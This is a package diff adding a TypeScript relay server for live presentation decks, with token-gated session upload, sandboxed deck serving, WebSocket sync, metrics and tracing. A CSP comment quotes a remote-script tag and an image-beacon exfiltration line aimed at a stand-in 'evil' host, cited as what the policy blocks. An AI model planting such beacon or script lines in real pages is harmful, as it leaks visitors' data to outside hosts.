@liebstoeckel/present-relay 0.3.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,546 @@
1
+ import {
2
+ Hub,
3
+ createSession,
4
+ roleForToken,
5
+ injectBootstrap,
6
+ injectWatermark,
7
+ audienceScopeFromHtml,
8
+ type Peer,
9
+ type PeerRole,
10
+ type Role,
11
+ type Session,
12
+ } from "@liebstoeckel/live-server";
13
+ import { bearer, matchAccount, safeEqual } from "./auth";
14
+ import { mintGrant, verifyGrant } from "./grant";
15
+ import { createRelayMetrics } from "./metrics";
16
+ import { withSpan, SpanKind, ctxFromHeaders } from "./tracing";
17
+
18
+ /** Templated path for relay span names, collapse session ids so the span name stays bounded
19
+ * (`/sync/<id>` → `/sync/:id`), the trace-name equivalent of the metric cardinality rule. */
20
+ function tracePath(pathname: string): string {
21
+ return pathname
22
+ .replace(/^\/api\/sessions\/[^/]+/, "/api/sessions/:id")
23
+ .replace(/^\/(s|sync)\/[^/]+/, "/$1/:id");
24
+ }
25
+
26
+ /** Pluggable object storage for session snapshots (ADR 0061). The hosted deploy wires
27
+ * a Bun S3 client; the core stays storage-agnostic + testable. */
28
+ export interface RelayStorage {
29
+ get(key: string): Promise<Uint8Array | null>;
30
+ put(key: string, bytes: Uint8Array): Promise<void>;
31
+ }
32
+
33
+ export interface RelayOptions {
34
+ /** pre-shared account API tokens; a POST must present one as `Bearer` */
35
+ accountTokens: readonly string[];
36
+ port?: number;
37
+ hostname?: string;
38
+ /** public base URL for the links we hand back (e.g. https://relay.example).
39
+ * Omitted → derived from the request (honors x-forwarded-proto/host). */
40
+ publicBaseUrl?: string;
41
+ /** max uploaded deck size (bytes) */
42
+ maxDeckBytes?: number;
43
+ /** max concurrent sessions per account */
44
+ maxSessionsPerAccount?: number;
45
+ /** session lifetime; the doc + tokens are dropped after this */
46
+ sessionTtlMs?: number;
47
+ /** inbound WS frame cap */
48
+ maxFrameBytes?: number;
49
+ /** keepalive period for each session Hub */
50
+ keepaliveMs?: number;
51
+ /** object storage for session snapshots (ADR 0061). Sessions created with an
52
+ * `x-snapshot-key` header are seeded from it on create and snapshotted to it on a
53
+ * timer + on end; absent → no persistence (the trusted/transient relay). */
54
+ storage?: RelayStorage;
55
+ /** snapshot debounce period (ms) for persisted sessions. */
56
+ snapshotMs?: number;
57
+ /** per-audience-peer write rate (enforced sessions). */
58
+ audienceRate?: { capacity: number; refillPerSec: number };
59
+ /** image tag for the `liebstoeckel_relay_build_info` metric (ADR 0073). */
60
+ version?: string;
61
+ }
62
+
63
+ interface RelaySession {
64
+ id: string;
65
+ account: string;
66
+ hub: Hub;
67
+ /** the built deck HTML (no bootstrap yet, injected per request) */
68
+ html: string;
69
+ session: Session;
70
+ /** privileged peer token: the local deck-runner that applies server-plugin effects */
71
+ runnerToken: string;
72
+ createdAt: number;
73
+ /** effective lifetime (ms), the plan duration for hosted sessions (ADR 0061),
74
+ * else the relay default. */
75
+ ttlMs: number;
76
+ /** hosted live (ADR 0061): write-scope enforce audience peers. */
77
+ enforce: boolean;
78
+ /** max concurrent audience peers (plan's liveAudienceCap); undefined = uncapped. */
79
+ audienceCap?: number;
80
+ /** current connected audience peers (for the cap). */
81
+ audienceCount: number;
82
+ /** show the "Published with liebstoeckel" provenance badge (free tier; ADR 0061). */
83
+ watermark: boolean;
84
+ /** object-storage key for this session's Yjs snapshot, if persisted. */
85
+ snapshotKey?: string;
86
+ ttl?: ReturnType<typeof setTimeout>;
87
+ snap?: ReturnType<typeof setInterval>;
88
+ }
89
+
90
+ export interface RelayServer {
91
+ port: number;
92
+ baseUrl: string;
93
+ sessions: Map<string, RelaySession>;
94
+ /** operational counters (ADR 0061 / ticket 0015), snapshot write failures so a
95
+ * silently-lost result surfaces in logs/metrics instead of vanishing. */
96
+ stats(): { snapshotFailures: number };
97
+ /** Flush every active session's final snapshot, then tear down. Awaitable so a
98
+ * SIGTERM handler can guarantee the writes land before the process exits
99
+ * (ADR 0071 §5 / ticket 0018, the racy fire-and-forget path lost results). */
100
+ stop(): Promise<void>;
101
+ }
102
+
103
+ type WSData = { sessionId: string; peer: Peer | null; role: PeerRole };
104
+
105
+ const hex = (bytes = 16): string => {
106
+ const a = new Uint8Array(bytes);
107
+ crypto.getRandomValues(a);
108
+ return Array.from(a, (b) => b.toString(16).padStart(2, "0")).join("");
109
+ };
110
+
111
+ const DEFAULTS = {
112
+ maxDeckBytes: 8 * 1024 * 1024,
113
+ // Per-pod safety valve, NOT the platform ceiling (ADR 0071 §2 / ticket 0017): real
114
+ // concurrency is gated by per-org entitlements + per-pod capacity in the control
115
+ // plane's choosePod, and sessions spread across the StatefulSet's pods. This just
116
+ // backstops a single pod's RAM.
117
+ maxSessionsPerAccount: 200,
118
+ sessionTtlMs: 6 * 60 * 60 * 1000,
119
+ maxFrameBytes: 4 * 1024 * 1024,
120
+ keepaliveMs: 25_000,
121
+ snapshotMs: 20_000,
122
+ audienceRate: { capacity: 20, refillPerSec: 5 },
123
+ };
124
+
125
+ /** Resolve the public http/ws origins for the links we return. */
126
+ function originOf(req: Request, opts: RelayOptions): { http: string; ws: string } {
127
+ if (opts.publicBaseUrl) {
128
+ const b = opts.publicBaseUrl.replace(/\/$/, "");
129
+ return { http: b, ws: b.replace(/^http/i, "ws") };
130
+ }
131
+ const url = new URL(req.url);
132
+ const proto = req.headers.get("x-forwarded-proto") ?? (url.protocol === "https:" ? "https" : "http");
133
+ const host = req.headers.get("x-forwarded-host") ?? url.host;
134
+ return { http: `${proto}://${host}`, ws: `${proto === "https" ? "wss" : "ws"}://${host}` };
135
+ }
136
+
137
+ const json = (body: unknown, status = 200): Response =>
138
+ new Response(JSON.stringify(body), { status, headers: { "content-type": "application/json" } });
139
+
140
+ /** Resolve a session's role for a token: presenter/viewer (public) or runner
141
+ * (the privileged deck-runner peer). null = deny. */
142
+ function relayRole(s: RelaySession, token: string | null): Role | "runner" | null {
143
+ if (!token) return null;
144
+ if (safeEqual(s.runnerToken, token)) return "runner";
145
+ return roleForToken(s.session, token);
146
+ }
147
+
148
+ /** Resolve a connection's role from `?t=…`, preferring a **signed grant** (ADR 0061):
149
+ * the control plane mints presenter/viewer grants the relay verifies statelessly with
150
+ * the session's account token, no per-session token lookup. Falls back to the raw
151
+ * session tokens (CLI presenter/viewer) and the runner token. null = deny. */
152
+ function resolveRole(s: RelaySession, token: string | null, now: number): Role | "runner" | null {
153
+ if (!token) return null;
154
+ const g = verifyGrant(token, s.account, now);
155
+ if (g && g.session === s.id && (g.role === "presenter" || g.role === "viewer")) return g.role;
156
+ return relayRole(s, token);
157
+ }
158
+
159
+ /** A public relay: account-token-gated deck upload, opaque-origin deck serving,
160
+ * and a token-gated Yjs WebSocket per session. Decks run their code locally (the
161
+ * runner connects as a privileged peer); the relay only relays + serves bytes. */
162
+ export function createRelay(opts: RelayOptions): RelayServer {
163
+ const cfg = { ...DEFAULTS, ...opts };
164
+ if (!opts.accountTokens.length) throw new Error("createRelay: at least one account token is required");
165
+ const sessions = new Map<string, RelaySession>();
166
+ let snapshotFailures = 0;
167
+ // Process start time, reported in /stats so the reconciler can tell when a pod has
168
+ // RESTARTED (same name, fresh memory) and re-provision sessions it lost, not just when
169
+ // a pod is gone (ADR 0071 §5 / ticket 0018+0019).
170
+ const startedAt = Date.now();
171
+ // Drain flag (ADR 0071 §4 / ticket 0019): the reconciler cordons a pod (POST /cordon)
172
+ // to stop NEW placement while existing sessions finish. Reported in /stats so the
173
+ // control plane's choosePod skips it; in-memory, so a recreated pod starts uncordoned.
174
+ let cordoned = false;
175
+
176
+ // Metrics (ADR 0073 / ticket 0023). Per-instance registry; scrape-time gauges are read
177
+ // from the live `sessions` map. Served bearer-gated at GET /metrics below.
178
+ const metrics = createRelayMetrics(opts.version ?? process.env.PRESENT_RELAY_VERSION ?? "unknown");
179
+ metrics.registry.onCollect(() => {
180
+ let audience = 0;
181
+ let deckBytes = 0;
182
+ for (const s of sessions.values()) {
183
+ audience += s.audienceCount;
184
+ deckBytes += Buffer.byteLength(s.html, "utf8");
185
+ }
186
+ metrics.sessions.set(sessions.size);
187
+ metrics.audiencePeers.set(audience);
188
+ metrics.deckBytes.set(deckBytes);
189
+ metrics.cordoned.set(cordoned ? 1 : 0);
190
+ metrics.startedAt.set(Math.floor(startedAt / 1000));
191
+ });
192
+
193
+ const persist = async (s: RelaySession) => {
194
+ if (!cfg.storage || !s.snapshotKey) return;
195
+ metrics.snapshotWrites.inc();
196
+ try {
197
+ await cfg.storage.put(s.snapshotKey, s.hub.snapshot());
198
+ } catch (e) {
199
+ // Best-effort: a failed write must never crash the relay, but it must NOT be
200
+ // silent (results would vanish). Structured log + a counter (ADR 0061).
201
+ snapshotFailures++;
202
+ metrics.snapshotFailures.inc();
203
+ console.error(
204
+ JSON.stringify({ level: "error", msg: "relay snapshot persist failed", key: s.snapshotKey, err: String(e) }),
205
+ );
206
+ }
207
+ };
208
+
209
+ const dropSession = (s: RelaySession) => {
210
+ if (s.ttl) clearTimeout(s.ttl);
211
+ if (s.snap) clearInterval(s.snap);
212
+ sessions.delete(s.id);
213
+ // Snapshot the final state before tearing down the doc (results survive, ADR 0061).
214
+ void persist(s).finally(() => s.hub.destroy());
215
+ };
216
+
217
+ // POST /api/sessions, create a live session from an uploaded deck (ADR 0061). A closure over
218
+ // cfg/sessions/metrics/persist/dropSession; returns the session-info JSON, or a reject response
219
+ // (401/503/413/400/429) with the matching metric incremented.
220
+ const handleCreateSession = async (req: Request): Promise<Response> => {
221
+ const account = matchAccount(cfg.accountTokens, bearer(req));
222
+ if (!account) {
223
+ metrics.sessionRejects.inc({ reason: "unauthorized" });
224
+ return json({ error: "unauthorized" }, 401);
225
+ }
226
+ // Cordoned pods take no new sessions, a backstop; placement already skips us.
227
+ if (cordoned) {
228
+ metrics.sessionRejects.inc({ reason: "cordoned" });
229
+ return json({ error: "relay draining" }, 503);
230
+ }
231
+
232
+ const declared = Number(req.headers.get("content-length") ?? "0");
233
+ if (declared > cfg.maxDeckBytes) {
234
+ metrics.sessionRejects.inc({ reason: "too_large" });
235
+ return json({ error: "deck too large" }, 413);
236
+ }
237
+ const html = await req.text();
238
+ if (Buffer.byteLength(html, "utf8") > cfg.maxDeckBytes) {
239
+ metrics.sessionRejects.inc({ reason: "too_large" });
240
+ return json({ error: "deck too large" }, 413);
241
+ }
242
+ if (!html.trim()) {
243
+ metrics.sessionRejects.inc({ reason: "empty" });
244
+ return json({ error: "empty deck" }, 400);
245
+ }
246
+
247
+ const count = [...sessions.values()].filter((s) => s.account === account).length;
248
+ if (count >= cfg.maxSessionsPerAccount) {
249
+ metrics.sessionRejects.inc({ reason: "quota" });
250
+ return json({ error: "session quota reached" }, 429);
251
+ }
252
+
253
+ // Hosted live (ADR 0061): the control plane opts a session into audience
254
+ // write-scope enforcement (scope read from the deck's own embedded manifest)
255
+ // and names the object-storage key its Yjs snapshot persists to.
256
+ const enforce = req.headers.get("x-live-enforce") === "1";
257
+ const snapshotKey = req.headers.get("x-snapshot-key") || undefined;
258
+ // Plan limits the control plane passes per session (ADR 0061): the duration
259
+ // (so a free session's link dies on time, not at the relay's 6h default) and
260
+ // the audience cap. TTL is clamped to the relay max; absent → relay default.
261
+ const reqTtl = Number(req.headers.get("x-session-ttl-ms") ?? "");
262
+ const ttlMs = Number.isFinite(reqTtl) && reqTtl > 0 ? Math.min(reqTtl, cfg.sessionTtlMs) : cfg.sessionTtlMs;
263
+ const capHdr = Number(req.headers.get("x-audience-cap") ?? "");
264
+ const audienceCap = Number.isFinite(capHdr) && capHdr > 0 ? capHdr : undefined;
265
+ const watermark = req.headers.get("x-watermark") === "1";
266
+ // Stable session id across re-provision (ADR 0072): the control plane re-creates
267
+ // a recovered session under the SAME id on a new pod, so the audience URL
268
+ // (`/s/<id>?t=<grant>`) and its stateless grant stay valid, only the pod the
269
+ // multi-layer ForwardAuth route resolves to changes. Absent (CLI) → relay mints one.
270
+ const providedId = (req.headers.get("x-session-id") || "").trim() || undefined;
271
+
272
+ const session = createSession();
273
+ if (providedId) {
274
+ // A stale entry under this id (re-provision raced its predecessor's teardown)
275
+ // is dropped + snapshotted first so the fresh, re-seeded one wins.
276
+ const stale = sessions.get(providedId);
277
+ if (stale) dropSession(stale);
278
+ session.id = providedId;
279
+ }
280
+ const hub = new Hub({
281
+ keepaliveMs: cfg.keepaliveMs,
282
+ audience: enforce ? { scope: audienceScopeFromHtml(html), rate: cfg.audienceRate } : undefined,
283
+ });
284
+ // Re-seed from a prior snapshot if one exists (relay restart / reconnect).
285
+ if (cfg.storage && snapshotKey) {
286
+ try {
287
+ const prior = await cfg.storage.get(snapshotKey);
288
+ if (prior) {
289
+ hub.seed(prior);
290
+ metrics.snapshotSeed.inc({ result: "hit" });
291
+ } else {
292
+ metrics.snapshotSeed.inc({ result: "miss" });
293
+ }
294
+ } catch {
295
+ /* no prior snapshot / unreadable → start fresh */
296
+ metrics.snapshotSeed.inc({ result: "error" });
297
+ }
298
+ }
299
+ const rs: RelaySession = {
300
+ id: session.id,
301
+ account,
302
+ hub,
303
+ html,
304
+ session,
305
+ runnerToken: hex(),
306
+ createdAt: Date.now(),
307
+ ttlMs,
308
+ enforce,
309
+ audienceCap,
310
+ audienceCount: 0,
311
+ watermark,
312
+ snapshotKey,
313
+ };
314
+ rs.ttl = setTimeout(() => dropSession(rs), ttlMs);
315
+ (rs.ttl as { unref?: () => void }).unref?.();
316
+ if (cfg.storage && snapshotKey) {
317
+ rs.snap = setInterval(() => void persist(rs), cfg.snapshotMs);
318
+ (rs.snap as { unref?: () => void }).unref?.();
319
+ }
320
+ sessions.set(rs.id, rs);
321
+ metrics.sessionCreates.inc();
322
+
323
+ // Mint signed, expiring presenter/viewer grants (ADR 0061), the links carry
324
+ // these, and the relay verifies them statelessly with the account token; no
325
+ // per-session token is stored client-side. (Raw tokens are still returned for
326
+ // CLI/runner back-compat.)
327
+ const exp = rs.createdAt + ttlMs;
328
+ const presenterGrant = mintGrant({ session: rs.id, role: "presenter", exp }, account);
329
+ const viewerGrant = mintGrant({ session: rs.id, role: "viewer", exp }, account);
330
+
331
+ const { http, ws } = originOf(req, opts);
332
+ return json({
333
+ id: rs.id,
334
+ presenterToken: session.presenterToken,
335
+ viewerToken: session.viewerToken,
336
+ runnerToken: rs.runnerToken,
337
+ presenterGrant,
338
+ viewerGrant,
339
+ expiresAt: exp,
340
+ urls: {
341
+ presenter: `${http}/s/${rs.id}?t=${presenterGrant}`,
342
+ viewer: `${http}/s/${rs.id}?t=${viewerGrant}`,
343
+ sync: `${ws}/sync/${rs.id}`,
344
+ },
345
+ });
346
+ };
347
+
348
+ // GET /s/:id, serve the deck to a grant-bearing presenter/viewer in an opaque sandbox
349
+ // (ADR 0014/0069). A closure over sessions; returns the sandboxed HTML, or a 403 on a
350
+ // missing/invalid/expired grant (runner tokens are WS-only and may not load the page).
351
+ const serveDeck = (req: Request, url: URL, id: string): Response => {
352
+ const s = sessions.get(id);
353
+ const token = url.searchParams.get("t");
354
+ const role = s ? resolveRole(s, token, Date.now()) : null;
355
+ if (!s || !role || role === "runner" || !token) {
356
+ metrics.grantDenials.inc();
357
+ return new Response("Invalid or expired link.", { status: 403 });
358
+ }
359
+ const { http, ws } = originOf(req, opts);
360
+ const wsUrl = `${ws}/sync/${s.id}?t=${token}`;
361
+ const viewer = `${http}/s/${s.id}?t=${s.session.viewerToken}`;
362
+ // Free-tier provenance badge on the public audience view (ADR 0061); paid
363
+ // (white-label) sessions omit it. Presenter view is never watermarked.
364
+ const html = s.watermark && role === "viewer" ? injectWatermark(s.html) : s.html;
365
+ const body = injectBootstrap(html, { ws: wsUrl, session: s.id, role, token, participant: "", viewer });
366
+ return new Response(body, {
367
+ headers: {
368
+ "content-type": "text/html; charset=utf-8",
369
+ // Opaque-origin isolation: no allow-same-origin → the deck can't reach
370
+ // the relay's cookies/API/DOM, and each load is a fresh opaque origin
371
+ // (deck-to-deck isolation). connect-src pins the live socket to us.
372
+ // `allow-popups` enables the presenter pop-out (P → window.open of
373
+ // /s/:id?t=<presenterToken>#presenter), the popup is itself served
374
+ // sandboxed by the relay and syncs through the Hub, so isolation holds
375
+ // (ADR 0014). Without it window.open throws in the sandbox.
376
+ // `allow-fullscreen` is NOT a valid CSP `sandbox` token (it's an
377
+ // iframe/Permissions-Policy feature), browsers reject it and log a
378
+ // console error. Fullscreen for this top-level doc is governed by the
379
+ // Fullscreen API / Permissions-Policy, not the sandbox directive.
380
+ //
381
+ // `default-src 'none'` + a single-file allowlist (ADR 0069): a deck
382
+ // inlines all assets (ADR 0001), so it needs zero external origins, // this blocks remote code (`<script src=evil>`) and GET-beacon exfil
383
+ // (`new Image().src='https://evil/?x'`) that `connect-src` can't pin.
384
+ // Mirrors the dashboard's static-share CSP, but keeps `connect-src`
385
+ // to our sync socket and `allow-popups` for the presenter pop-out.
386
+ "content-security-policy": `default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data: blob:; font-src data:; media-src data: blob:; connect-src ${ws} ${http}; frame-ancestors 'none'; sandbox allow-scripts allow-popups`,
387
+ "x-content-type-options": "nosniff",
388
+ "referrer-policy": "no-referrer",
389
+ },
390
+ });
391
+ };
392
+
393
+ // HTTP dispatcher, a closure (keeps access to sessions/cfg/cordoned), wrapped in a SERVER span
394
+ // by the Bun.serve `fetch` below. Returns a Response, or undefined for a successful WebSocket
395
+ // upgrade (Bun's hold-the-socket signal). The two fat routes live in their own closures above;
396
+ // the small infra/control + connect routes stay inline.
397
+ const handleFetch = async (req: Request, srv: Bun.Server<WSData>): Promise<Response | undefined> => {
398
+ const url = new URL(req.url);
399
+ const { pathname } = url;
400
+
401
+ if (pathname === "/healthz") return new Response("ok");
402
+
403
+ // --- fleet stats: this pod's live load, for control-plane placement (ADR 0071 §2). ---
404
+ // Account-gated, the per-pod Ingress makes it publicly reachable.
405
+ if (pathname === "/stats") {
406
+ if (!matchAccount(cfg.accountTokens, bearer(req))) return json({ error: "unauthorized" }, 401);
407
+ return json({ ok: true, sessions: sessions.size, cordoned, startedAt });
408
+ }
409
+
410
+ // --- Prometheus metrics: this pod's logical state (ADR 0073). Account-gated like /stats, so
411
+ // the bearer keeps it off the public surface; Alloy scrapes it on the pod network. ---
412
+ if (pathname === "/metrics") {
413
+ if (!matchAccount(cfg.accountTokens, bearer(req))) return new Response("unauthorized", { status: 401 });
414
+ return new Response(metrics.registry.render(), {
415
+ headers: { "content-type": "text/plain; version=0.0.4; charset=utf-8" },
416
+ });
417
+ }
418
+
419
+ // --- drain control: cordon/uncordon this pod (reconciler only, ADR 0071 §4). Cordoned →
420
+ // refuse NEW sessions; existing run to completion. `{ "cordoned": false }` lifts it. ---
421
+ if (pathname === "/cordon" && req.method === "POST") {
422
+ if (!matchAccount(cfg.accountTokens, bearer(req))) return json({ error: "unauthorized" }, 401);
423
+ const body = (await req.json().catch(() => ({}))) as { cordoned?: boolean };
424
+ cordoned = body.cordoned !== false;
425
+ return json({ ok: true, cordoned });
426
+ }
427
+
428
+ // --- control API: create / end a session (ADR 0061). ---
429
+ if (pathname === "/api/sessions" && req.method === "POST") return handleCreateSession(req);
430
+ const del = pathname.match(/^\/api\/sessions\/([^/]+)$/);
431
+ if (del && req.method === "DELETE") {
432
+ const account = matchAccount(cfg.accountTokens, bearer(req));
433
+ if (!account) return json({ error: "unauthorized" }, 401);
434
+ const s = sessions.get(del[1]!);
435
+ if (!s || s.account !== account) return json({ error: "not found" }, 404);
436
+ dropSession(s);
437
+ return new Response(null, { status: 204 });
438
+ }
439
+
440
+ // --- WebSocket sync: audience/presenter connect (ADR 0061). ---
441
+ const sync = pathname.match(/^\/sync\/([^/]+)$/);
442
+ if (sync) {
443
+ const s = sessions.get(sync[1]!);
444
+ const relRole = s ? resolveRole(s, url.searchParams.get("t"), Date.now()) : null;
445
+ if (!s || !relRole) {
446
+ metrics.grantDenials.inc();
447
+ return new Response("forbidden", { status: 403 });
448
+ }
449
+ // viewer → audience (write-scope enforced when the session opted in);
450
+ // presenter + runner are trusted writers.
451
+ const role: PeerRole = relRole === "viewer" ? "audience" : "presenter";
452
+ // Enforce the plan's audience cap (ADR 0061), presenter/runner never count.
453
+ if (role === "audience" && s.audienceCap !== undefined && s.audienceCount >= s.audienceCap) {
454
+ metrics.audienceCapRejects.inc();
455
+ return new Response("audience full", { status: 503 });
456
+ }
457
+ const data: WSData = { sessionId: s.id, peer: null, role };
458
+ return srv.upgrade(req, { data }) ? undefined : new Response("upgrade failed", { status: 400 });
459
+ }
460
+
461
+ // --- serve the deck in an opaque sandbox (ADR 0014/0069). ---
462
+ const serve = pathname.match(/^\/s\/([^/]+)$/);
463
+ if (serve) return serveDeck(req, url, serve[1]!);
464
+
465
+ return new Response("not found", { status: 404 });
466
+ };
467
+
468
+ const server = Bun.serve<WSData>({
469
+ port: opts.port ?? 0,
470
+ hostname: opts.hostname ?? "0.0.0.0",
471
+ // OSS-safe ingress tracing: gated by OTEL_EXPORTER_OTLP_ENDPOINT (a no-op with NO egress when
472
+ // unset, a standalone/offline relay emits nothing). A SERVER span continuing the inbound W3C
473
+ // traceparent so the relay JOINS the trace: control → relay (session create) and the audience
474
+ // traefik → relay path. Infra/control paths (probes, scrapes, cordon) are not traced.
475
+ fetch(req, srv) {
476
+ const { pathname } = new URL(req.url);
477
+ if (pathname === "/healthz" || pathname === "/stats" || pathname === "/metrics" || pathname === "/cordon") {
478
+ return handleFetch(req, srv);
479
+ }
480
+ return withSpan(
481
+ `relay ${req.method} ${tracePath(pathname)}`,
482
+ ctxFromHeaders(req.headers),
483
+ { "http.request.method": req.method, "url.path": pathname },
484
+ () => handleFetch(req, srv),
485
+ SpanKind.SERVER,
486
+ );
487
+ },
488
+ websocket: {
489
+ idleTimeout: 120,
490
+ maxPayloadLength: cfg.maxFrameBytes,
491
+ open(socket) {
492
+ const s = sessions.get(socket.data.sessionId);
493
+ if (!s) {
494
+ socket.close();
495
+ return;
496
+ }
497
+ if (socket.data.role === "audience") s.audienceCount++;
498
+ metrics.wsOpens.inc({ role: socket.data.role });
499
+ metrics.wsConnections.inc({ role: socket.data.role });
500
+ socket.data.peer = s.hub.join((d) => {
501
+ metrics.wsFrames.inc({ dir: "out" });
502
+ metrics.wsBytes.inc({ dir: "out" }, d.byteLength);
503
+ socket.send(d);
504
+ }, socket.data.role);
505
+ },
506
+ message(socket, msg) {
507
+ if (typeof msg === "string") return;
508
+ const bytes = new Uint8Array(msg as unknown as ArrayBufferLike);
509
+ if (bytes.byteLength > cfg.maxFrameBytes) return;
510
+ metrics.wsFrames.inc({ dir: "in" });
511
+ metrics.wsBytes.inc({ dir: "in" }, bytes.byteLength);
512
+ socket.data.peer?.recv(bytes);
513
+ },
514
+ close(socket) {
515
+ socket.data.peer?.leave();
516
+ metrics.wsCloses.inc({ role: socket.data.role });
517
+ metrics.wsConnections.dec({ role: socket.data.role });
518
+ const s = sessions.get(socket.data.sessionId);
519
+ if (s && socket.data.role === "audience" && s.audienceCount > 0) s.audienceCount--;
520
+ },
521
+ },
522
+ });
523
+
524
+ const port = server.port ?? 0;
525
+ return {
526
+ port,
527
+ baseUrl: opts.publicBaseUrl?.replace(/\/$/, "") ?? `http://${opts.hostname ?? "0.0.0.0"}:${port}`,
528
+ sessions,
529
+ stats: () => ({ snapshotFailures }),
530
+ async stop() {
531
+ const active = [...sessions.values()];
532
+ // Flush every active session's final snapshot and AWAIT the writes before
533
+ // tearing down. The old path fired `dropSession` (un-awaited persist) then
534
+ // returned, so a SIGTERM + process.exit raced the S3 PUTs and lost the last
535
+ // interval's state. Now a graceful shutdown is lossless (ADR 0071 §5).
536
+ await Promise.allSettled(active.map((s) => persist(s)));
537
+ for (const s of active) {
538
+ if (s.ttl) clearTimeout(s.ttl);
539
+ if (s.snap) clearInterval(s.snap);
540
+ sessions.delete(s.id);
541
+ s.hub.destroy();
542
+ }
543
+ server.stop(true);
544
+ },
545
+ };
546
+ }
package/src/tracing.ts ADDED
@@ -0,0 +1,86 @@
1
+ import { trace, context, propagation, SpanStatusCode, SpanKind, type Span, type Context } from "@opentelemetry/api";
2
+ import { BasicTracerProvider, BatchSpanProcessor } from "@opentelemetry/sdk-trace-base";
3
+
4
+ // Re-export so call sites set span kind via the tracing module (centralized OTel access).
5
+ export { SpanKind };
6
+ import { OTLPTraceExporter } from "@opentelemetry/exporter-trace-otlp-http";
7
+ import { resourceFromAttributes } from "@opentelemetry/resources";
8
+ import { ATTR_SERVICE_NAME, ATTR_SERVICE_VERSION } from "@opentelemetry/semantic-conventions";
9
+ import { AsyncLocalStorageContextManager } from "@opentelemetry/context-async-hooks";
10
+ import { W3CTraceContextPropagator } from "@opentelemetry/core";
11
+
12
+ // OTLP tracing for the relay (ADR 0073 step 3b / ticket 0024). MANUAL spans + W3C
13
+ // `traceparent` propagation, not auto-instrumentation (require-in-the-middle is unreliable
14
+ // under Bun; the propagator + AsyncLocalStorage context API work, verified). **Gated**: a no-op
15
+ // unless OTEL_EXPORTER_OTLP_ENDPOINT is set, so the services run identically with tracing off, // every helper below degrades to a safe no-op (the API's default no-op tracer/propagator).
16
+ //
17
+ // Duplicated in packages/present-relay/src/tracing.ts (present-relay is OSS-published; a shared
18
+ // package would force the five-place OSS lock-step).
19
+
20
+ let started = false;
21
+
22
+ /** Initialise the global tracer once. Call at process start. No-op without the OTLP endpoint. */
23
+ export function initTracing(serviceName: string): void {
24
+ if (started) return;
25
+ const endpoint = process.env.OTEL_EXPORTER_OTLP_ENDPOINT;
26
+ if (!endpoint) return;
27
+ started = true;
28
+ const provider = new BasicTracerProvider({
29
+ resource: resourceFromAttributes({
30
+ [ATTR_SERVICE_NAME]: serviceName,
31
+ [ATTR_SERVICE_VERSION]: process.env.PRESENT_RELAY_VERSION ?? "unknown",
32
+ }),
33
+ spanProcessors: [new BatchSpanProcessor(new OTLPTraceExporter({ url: `${endpoint.replace(/\/$/, "")}/v1/traces` }))],
34
+ });
35
+ trace.setGlobalTracerProvider(provider);
36
+ context.setGlobalContextManager(new AsyncLocalStorageContextManager().enable());
37
+ propagation.setGlobalPropagator(new W3CTraceContextPropagator());
38
+ }
39
+
40
+ const tracer = () => trace.getTracer("liebstoeckel");
41
+
42
+ /** Parent context extracted from incoming request headers (W3C traceparent). */
43
+ export function ctxFromHeaders(headers: Headers): Context {
44
+ const carrier: Record<string, string> = {};
45
+ headers.forEach((v, k) => {
46
+ carrier[k] = v;
47
+ });
48
+ return propagation.extract(context.active(), carrier);
49
+ }
50
+
51
+ /** Inject the active trace context into outbound headers for downstream propagation. */
52
+ export function injectHeaders(h: Record<string, string> = {}): Record<string, string> {
53
+ propagation.inject(context.active(), h);
54
+ return h;
55
+ }
56
+
57
+ /** The active trace id (for stamping into structured logs), or undefined when off/unsampled. */
58
+ export function activeTraceId(): string | undefined {
59
+ const sc = trace.getSpanContext(context.active());
60
+ return sc && sc.traceId !== "00000000000000000000000000000000" ? sc.traceId : undefined;
61
+ }
62
+
63
+ /** Run `fn` inside a span (child of `parent` if given, else the active context), recording
64
+ * errors. Safe no-op semantics when tracing is off (non-recording span, fn still runs). */
65
+ export async function withSpan<T>(
66
+ name: string,
67
+ parent: Context | undefined,
68
+ attrs: Record<string, string | number | boolean>,
69
+ fn: (span: Span) => Promise<T> | T,
70
+ // Default INTERNAL; set SERVER on ingress handlers and CLIENT on outbound calls so the
71
+ // service graph + Traces-Drilldown "structure" view can build the trace hierarchy (those
72
+ // views key off SERVER spans with CLIENT edges, INTERNAL-only traces show no structure).
73
+ kind: SpanKind = SpanKind.INTERNAL,
74
+ ): Promise<T> {
75
+ const base = parent ?? context.active();
76
+ const span = tracer().startSpan(name, { kind, attributes: attrs }, base);
77
+ try {
78
+ return await context.with(trace.setSpan(base, span), () => fn(span));
79
+ } catch (e) {
80
+ span.recordException(e as Error);
81
+ span.setStatus({ code: SpanStatusCode.ERROR, message: String(e) });
82
+ throw e;
83
+ } finally {
84
+ span.end();
85
+ }
86
+ }